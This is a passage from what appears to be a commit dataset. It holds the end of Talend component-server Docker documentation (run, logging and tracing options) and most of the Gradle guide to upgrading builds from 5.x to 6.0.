(where logs are written).\n\ninclude::server-uispec.adoc[leveloffset=+1]\n\n== Docker\n\nThe server image is deployed on Docker. Its version is suffixed with a timestamp to ensure\nimages are not overriden and can break your usage. You can check the available version on Docker hub.\n\n\n=== Run\n\nYou can run the docker image by executing this command :\n\n[source,sh]\n----\n$ sudo docker run -p 8080:8080 tacokit\/component-starter\n----\n\n=== Configure\n\nYou can set the env variable `MEECROWAVE_OPTS` to customize the server, by default it is installed in `\/opt\/talend\/component-kit`.\n\n=== Maven repository\n\nThe maven repository is the default one of the machine, you can change it setting the system property\n`talend_component_server_maven_repository=\/path\/to\/your\/m2`.\n\n==== Deploy components to the server\n\nIf you want to deploy some components you can configure which ones in MEECROWAVE_OPTS (see server doc online)\nand redirect your local m2:\n\n[source,sh]\n----\n$ docker run \\\n -p 8080:8080 \\\n -v ~\/.m2:\/root\/.m2 \\\n -e MEECROWAVE_OPTS=\"-Dtalend.component.server.component.coordinates=g:a:v,g2:a2:v2,...\" \\\n component-server\n----\n\n=== Logging\n\nThe component server docker image comes with two log4j2 profile `default` and `kafka`.\nThe logging profile can be changed by setting the environment variable `TALEND_COMPONENT_LOG4J2_PROFILE` to `kafka`\nthe `default` profile is active by default.\n\n==== default profile\n\nThe *default* profile has file and console logging capabilities.\nThe console logging is off by default and you can activate it by setting `CONSOLE_LOG_LEVEL` environment variable\nto `DEBUG`, `INFO`, `WARN` or any other log level supported by log4j2. In practise and during development you will want\nto see the logs without connecting to the server by activating console logging.\n\nRun docker image with console logging\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n\t-e CONSOLE_LOG_LEVEL=INFO \\\n\tcomponent-server\n----\n\n==== Kafka profile\n\n*Kafka* profile let you send log to Kafka servers. The log are formatted in json and follow the layout defined by Talend\nand described here https:\/\/github.com\/Talend\/daikon\/tree\/master\/daikon-logging\/logging-event-layout\n\nThis profile require two environment variables\n\n* `LOG_KAFKA_TOPIC` : Kafka topic.\n* `LOG_KAFKA_URL` : A list of host\/port pairs to use for establishing the initial connection to the Kafka cluster.\nThis list should be in the form `url:port` separated by `,`\n\nRun docker image with kafka profile\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n -e TALEND_COMPONENT_LOG4J2_PROFILE=kafka \\\n -e LOG_KAFKA_URL=`log kafka url:port` \\\n -e LOG_KAFKA_TOPIC=`log kafka topic` \\\n\t-e TRACING_KAFKA_URL=`tracing kafka url:port` \\\n\t-e TRACING_KAFKA_TOPIC=`tracing kafka topic` \\\n\ttacokit\/component-server\n----\n\n*Note* : `LOG_KAFKA_TOPIC` will receive the application and the access logs\nand `TRACING_KAFKA_TOPIC` will receive brave tracing logs.\n\n==== Tracing (Brave Monitoring)\n\nThe component server use https:\/\/github.com\/openzipkin\/brave to monitor request.\n\nThe tracing can be activated by setting environment variable `TRACING_ON` to `true`.\n\nYou can choose the reporter type by setting `talend_component_server_monitoring_brave_reporter_type` environment variable\nto `log` (this is the default value in this docker image) or to `noop`\nwhich will deactivate the tracing. __Other type of reporter may be added in the future.__\n\nThe tracing rate is configurable by setting environment variable `TRACING_SAMPLING_RATE`.\nThis is the default sample rate for all the endpoints and has a default value of 0.1\n\nYou can define more accurate rate for every component server endpoint using those environment variables :\n\n[options=\"header,autowidth\"]\n|===\n| Environment variable | Endpoint\n| `talend_component_server_monitoring_brave_sampling_environment_rate` | `\/api\/v1\/environment`\n| `talend_component_server_monitoring_brave_sampling_configurationtype_rate` | `\/api\/v1\/configurationtype`\n| `talend_component_server_monitoring_brave_sampling_component_rate` | `\/api\/v1\/component`\n| `talend_component_server_monitoring_brave_sampling_documentation_rate` | `\/api\/v1\/documentation`\n| `talend_component_server_monitoring_brave_sampling_action_rate` | `\/api\/v1\/action`\n| `talend_component_server_monitoring_brave_sampling_execution_rate` | `\/api\/v1\/execution`\n|===\n\nRun docker image with tracing on\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n\t-e TRACING_ON=true \\\n\t-e TRACING_SAMPLING_RATE = 0.1 \\\n\ttacokit\/component-server\n----\n\n=== Build the image yourself\n\nYou can build component starter server in docker following those instructions :\n\n[source,sh]\n----\ndocker build --build-arg ARTIFACT_ID=component-starter-server \\\n --build-arg SERVER_VERSION=`component starter server version` \\\n --tag tacokit\/component-server .\n----\n\nIMPORTANT: this assumes the project is built before you run that command.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fba880e049b50b4562e3a4b838c22eb8ead3047","subject":"Update subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","message":"Update subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc\n\nCo-Authored-By: Sterling Greene <f8dc2ca1b24f71bd07cf2580bf789fed70c9e45c@users.noreply.github.com>","repos":"gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other sources sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== `IncrementalTaskInputs` has been deprecated\n\nIn Gradle 5.4 we introduced a new API for implementing <<custom_tasks.adoc#incremental_tasks,incremental tasks>>: link:{groovyDslPath}\/org.gradle.work.InputChanges.html[InputChanges].\nIts predecessor `IncrementalTaskInputs` has been deprecated.\n\n==== Forced dependencies\n\nForcing dependency versions using `force = true` on a first-level dependency is deprecated.\nForce has both a semantic and ordering issue which can be avoided by using a <<rich_versions.adoc#rich-version-constraints, strict version constraint>>.\n\n==== Invalid task definitions and configurations\n\nProblems with task definitions are called out in deprecation warnings like this:\n\n```\nProperty 'options.configFile' is not annotated with an input or output annotation. This behaviour has been deprecated and is scheduled to be removed in Gradle 7.0.\n```\n\n==== Search upwards related API in `StartParameter` has been deprecated\n\nIn Gradle 5.0 we removed the `--no-search-upward` CLI parameter.\nThe related APIs in `StartParameter` are now deprecated.\n\n==== `BuildListener#buildStarted` and `Gradle#buildStarted` has been deprecated\n\nThese methods currently do not work as expected.\nThey are being deprecated to avoid confusion.\n\n=== Potential breaking changes\n\n==== Android Gradle Plugin 3.3 and earlier is not supported anymore\n\nGradle 6.0 supports Android Gradle Plugin versions 3.4 and later.\n\n==== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can be specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to maintain executing build no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will result the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\n[Gradle Module Metadata](https:\/\/blog.gradle.org\/gradle-metadata-1.0), officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nSimilar, for dynamic versions, the `metadata.xml` for the corresponding module needs to be present in a Maven repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:supported_metadata_sources,metadata source>>.\n\n==== buildSrc classes are no longer visible from settings scripts\n\nPreviously, the buildSrc project was built before applying the project's settings script and its classes were visible within the script.\nNow, buildSrc is built after the settings script and its classes are not visible to it.\nThe buildSrc classes remain visible to project build scripts and script plugins.\n\nCustom logic can be used from a settings script by <<tutorial_using_tasks.adoc#sec:build_script_external_dependencies, declaring external dependencies>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Plugin validation changes\n\n- The `validateTaskProperties` task is now deprecated, use `validatePlugins` instead.\n The new name better reflects the fact that it also validates artifact transform parameters and other non-property definitions.\n- The `ValidateTaskProperties` type is replaced by `ValidatePlugins`.\n- The `setClasses()` method is now removed. Use `getClasses().setFrom()` instead.\n- The `setClasspath()` method is also removed. use `getClasspath().setFrom()` instead.\n- The link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html#getFailOnWarning--[failOnWarning] option is now enabled by default.\n- The following task validation errors now fail the build at runtime and are promoted to errors for link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins]:\n * A task property is annotated with a property annotation not allowed for tasks, like `@InputArtifact`.\n\n==== `DefaultTask` and `ProjectLayout` methods replaced with `ObjectFactory`\n\nUse `ObjectFactory.fileProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputFile()`\n- `DefaultTask.newOutputFile()`\n- `ProjectLayout.fileProperty()`\n\nUse `ObjectFactory.directoryProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputDirectory()`\n- `DefaultTask.newOutputDirectory()`\n- `ProjectLayout.directoryProperty()`\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== `AbstractCompile.compile()` is gone\n\nThe abstract method `compile()` is no longer declared by `AbstractCompile`.\nTasks extending `AbstractCompile` can implement their own `@TaskAction` method with the name of their choosing.\nThey are also free to add a `@TaskAction` method with an `InputChanges` parameter without having to implement a parameter-less one as well.\n\n==== Using the `embedded-kotlin` plugin now requires a repository\n\nJust like when using the `kotlin-dsl` plugin, it is now required to declare a repository where Kotlin dependencies can be found if you apply the `embedded-kotlin` plugin.\n\n```kotlin\nplugins {\n `embedded-kotlin`\n}\n\nrepositories {\n jcenter()\n}\n```\n\n==== Kotlin DSL IDE support now requires Kotlin IntelliJ Plugin >= 1.3.50\n\nWith Kotlin IntelliJ plugin versions prior to 1.3.50, Kotlin DSL scripts will be wrongly highlighted when the _Gradle JVM_ is set to a version different from the one in _Project SDK_.\nSimply upgrade your IDE plugin to a version >= 1.3.50 to restore the correct Kotlin DSL script highlighting behavior.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\n==== Updates to default integration versions\n\n- Checkstyle has been updated to https:\/\/checkstyle.org\/releasenotes.html#Release_8.24[Checkstyle 8.24].\n- CodeNarc has been updated to https:\/\/github.com\/CodeNarc\/CodeNarc\/blob\/master\/CHANGELOG.md#version-14---may-2019[CodeNarc 1.4].\n- PMD has been updated to https:\/\/pmd.github.io\/latest\/pmd_release_notes.html#28-july-2019---6170[PMD 6.17.0].\n\n==== Javadoc and Groovydoc don't include timestamps by default\n\nTimestamps in the generated documentation have very limited practical use, however they make it impossible to have repeatable documentation builds.\nTherefore, the `Javadoc` and `Groovydoc` tasks are now configured to not include timestamps by default any more.\n\n==== User provided 'config_loc' properties are ignored by Checkstyle\n\nGradle always uses `configDirectory` as the value for 'config_loc' when running Checkstyle.\n\n==== Changing the pom packaging no longer changes the artifact extension\n\nPreviously, the extension of the main artifact published to a Maven repository, typically a _jar_, was changed during publishing if the pom packaging was not _jar_, _ejb_, _bundle_ or _maven-plugin_.\nThis behavior let to broken Gradle Module Metadata and was difficult to understand due to different handling of different packaging types.\nBuild authors can change the artifact name when the artifact is created to obtain the same result as before - e.g. by setting `jar.archiveExtension.set(pomPackaging)`.\n\n==== Ivy.xml published for Java libraries contains more information\n\nA number of fixes were made to produce more correct `ivy.xml` metadata in the `ivy-publish` plugin.\nAs a consequence, the internal structure of the `ivy.xml` file has changed.\nHowever, selecting the `default` configuration yields the same result as before.\nOnly the `runtime` configuration now contains more information which corresponds to the _runtimeElements_ variant of a Java library.\nIn general, users are advised to migrate from `ivy.xml` to the new Gradle Module Metadata format.\n\n==== Executing Gradle without a settings file has been deprecated\n\nA Gradle build is defined by a `settings.gradle[.kts]` file in the current or parent directory.\nWithout a settings file, a Gradle build is undefined and will emit a deprecation warning.\n\nIn Gradle 7.0, Gradle will only allow you to invoke the `init` task or diagnostic command line flags, such as `--version`, with undefined builds.\n\n==== Calling afterEvaluate on an evaluated project has been deprecated\n\nOnce a project is evaluated, Gradle ignores all configuration passed to `Project#afterEvaluate` and emits a deprecation warning. This scenario will become an error in Gradle 7.0.\nTo avoid confusion, this scenario will become an error in Gradle 7.0.\nUntil then, a deprecation warning will be shown.\n\n==== Miscellaneous\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` no longer can inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n* The `getEffectiveAnnotationProcessorPath()` method is removed from the `JavaCompile` and `ScalaCompile` tasks.\n* Changing the value of a task property with type `Property<T>` after the task has started execution now results in an error.\n* The `isLegacyLayout()` method is removed from `SourceSetOutput`.\n* The map returned by `TaskInputs.getProperties()` is now unmodifiable.\n Trying to modify it will result in an `UnsupportedOperationException` being thrown.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle up-to-date checks and build cache lookup\nusing different values to those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy. (e.g. `CompileOnlyCopy2`)\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n==== File removal operations don't follow symlinked directories\n\nWhen Gradle has to remove the output files of a task for various reasons, it will not follow symlinked directories.\nThe symlink itself will be deleted, but the contents of the linked directory will stay intact.\n\n=== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebu()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n=== Scala 2.9 and Zinc compiler\n\nGradle no longer supports building applications using Scala 2.9.\nThe Zinc compiler has been upgraded to 1.2.5 and requires Scala 2.10.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two build's build-scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a 